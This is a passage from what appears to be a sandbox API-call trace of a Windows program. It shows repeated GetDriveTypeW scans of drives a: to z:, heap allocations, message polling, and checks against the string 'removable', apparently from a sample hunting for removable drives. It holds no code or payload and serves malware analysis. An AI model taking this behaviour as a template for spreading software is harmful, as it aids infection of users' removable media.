[0214.542] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.542] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.542] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.542] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.543] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.543] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.543] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.543] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.543] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.543] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.543] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.544] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.544] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.544] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.544] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.544] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.544] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.544] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.545] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0214.545] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.545] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.545] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0214.545] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.546] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0214.546] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.546] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.546] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.546] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.546] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.547] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.547] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.547] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.547] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.547] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.547] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.548] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.548] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.548] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.548] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.549] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.549] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.549] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.549] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.549] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.549] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.550] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.550] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.550] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.550] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.550] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.551] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.551] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.551] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.551] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.551] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.551] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.551] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.552] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.552] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.552] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.552] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.552] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.552] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.552] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.552] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.575] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.576] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.576] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.576] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.576] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.576] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.577] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.577] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.577] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.577] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.577] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.577] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.578] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.578] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.578] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.578] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.579] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.579] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.579] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.579] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.579] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.580] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.580] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.580] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.580] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.581] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.581] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.581] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.581] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.581] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.581] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.582] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.582] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.582] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.582] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.582] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.583] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.583] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.583] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.583] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.583] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.583] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.584] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.584] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.584] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.584] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.584] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.585] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.585] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.585] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.585] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.586] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.586] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.586] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.586] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.586] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.586] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.586] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.586] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.587] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.587] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.587] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.587] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.587] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.587] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.588] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.588] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.588] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.588] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.589] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.589] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.589] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.589] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.589] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.590] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.590] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.590] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.590] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.591] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.591] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.591] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.591] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.591] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.592] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.592] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0214.592] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0214.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0214.593] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0214.593] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.593] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.593] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.594] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.594] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0214.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0214.594] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.594] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.594] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.594] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.595] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.595] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.595] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.595] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.595] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.595] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.596] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.596] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.596] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.596] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.596] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.597] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.597] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.597] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.597] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.597] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.597] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.598] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.598] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.598] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.598] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.598] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.598] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0214.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.599] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0214.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.599] 